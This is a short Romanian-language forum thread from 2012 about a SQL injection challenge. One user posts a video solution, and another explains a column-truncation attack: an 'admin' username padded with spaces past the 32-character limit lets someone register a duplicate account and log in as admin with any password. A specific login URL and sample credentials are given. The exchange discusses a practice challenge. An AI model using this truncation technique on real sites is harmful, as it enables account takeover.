totti93 Posted August 27, 2012 Report Share Posted August 27, 2012 Rezolvare video pentru https://rstcenter.com/forum/57810-sql-injection-challenge-unknown-level.rstScuze pentru romana mea sacadata, dar nu e limba mea materna... 1 Quote Link to comment Share on other sites More sharing options...
HrN Posted August 27, 2012 Report Share Posted August 27, 2012 (edited) Si daca putem sa ne logham cu orice user fara a folosii update-ul ala, cate puncte primim?Mor cand vad ca nu puneti limita de chr la username in register... Edited August 27, 2012 by HrN Quote Link to comment Share on other sites More sharing options...
totti93 Posted August 27, 2012 Author Report Share Posted August 27, 2012 Challenge-ul avea cerintele sale...@HrN Da-mi un exemplu. Quote Link to comment Share on other sites More sharing options...
HrN Posted August 27, 2012 Report Share Posted August 27, 2012 Daca tu imi pui limita in mysql pe coloana username de 32 de chr si nu imi verifici numarul de chr introdus in inregistrare pot sa inregistrez ceva de genul:username: admin x(admin urmat de cel putin 27 de space-uri si un x)password: 123456Cand iti verifica daca exista deja username-ul iti va da false, dar cand il va introduce in baza de date, va introduce doar primele 32 de chr.Si poti sa te loghezi cu toate parolele, de exemplu:http://94.249.208.142/login.phpusername: adminpassword: hrnhrnsau username: adminpassword: 123123Ambele sunt valide. 1 Quote Link to comment Share on other sites More sharing options...